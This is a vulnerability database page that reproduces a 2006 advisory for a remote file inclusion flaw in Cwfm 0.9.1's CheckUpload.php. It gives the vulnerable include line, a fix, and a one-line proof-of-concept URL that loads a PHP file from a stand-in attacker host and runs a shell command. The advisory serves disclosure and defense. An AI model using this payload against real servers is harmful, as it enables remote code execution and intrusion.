header-logo
Suggest Exploit
vendor:
Cwfm
by:
Philipp Niedziela
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Cwfm
Affected Version From: 0.9.1
Affected Version To: 0.9.1
Patch Exists: NO
Related CWE: N/A
CPE: a:cwfm:cwfm:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Cwfm-0.9.1 (Language) Remote File Inclusion

Cwfm 0.9.1 is vulnerable to Remote File Inclusion in /CheckUpload.php. The $Language variable is not properly sanitized before being used, allowing an attacker to include a remote file and execute arbitrary code on the vulnerable server.

Mitigation:

Declare $Language before using, include config-file or denie direct access to the vuln file.
Source

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]

Navigation

Suggest Exploit

Services By CQR